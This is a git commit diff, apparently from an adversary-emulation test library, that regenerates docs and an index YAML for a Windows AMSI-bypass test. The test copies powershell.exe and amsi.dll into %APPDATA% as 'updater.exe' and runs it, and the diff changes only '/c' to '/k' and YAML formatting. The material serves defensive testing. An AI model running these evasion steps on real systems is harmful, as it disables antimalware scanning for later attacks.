Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
e1f2936764
commit
641a1d027d
@@ -29,7 +29,7 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
|
||||
```
|
||||
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
|
||||
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
|
||||
cmd.exe /c %APPDATA%\updater.exe
|
||||
cmd.exe /k %APPDATA%\updater.exe
|
||||
```
|
||||
|
||||
|
||||
|
||||
+6
-6
@@ -1385,10 +1385,10 @@ persistence:
|
||||
executor:
|
||||
name: command_prompt
|
||||
elevation_required: false
|
||||
command: |-
|
||||
command: |
|
||||
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
|
||||
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
|
||||
cmd.exe /c %APPDATA%\updater.exe
|
||||
cmd.exe /k %APPDATA%\updater.exe
|
||||
T1158:
|
||||
technique:
|
||||
external_references:
|
||||
@@ -5823,10 +5823,10 @@ defense-evasion:
|
||||
executor:
|
||||
name: command_prompt
|
||||
elevation_required: false
|
||||
command: |-
|
||||
command: |
|
||||
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
|
||||
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
|
||||
cmd.exe /c %APPDATA%\updater.exe
|
||||
cmd.exe /k %APPDATA%\updater.exe
|
||||
T1140:
|
||||
technique:
|
||||
external_references:
|
||||
@@ -11329,10 +11329,10 @@ privilege-escalation:
|
||||
executor:
|
||||
name: command_prompt
|
||||
elevation_required: false
|
||||
command: |-
|
||||
command: |
|
||||
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
|
||||
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
|
||||
cmd.exe /c %APPDATA%\updater.exe
|
||||
cmd.exe /k %APPDATA%\updater.exe
|
||||
T1179:
|
||||
technique:
|
||||
external_references:
|
||||
|
||||
Reference in New Issue
Block a user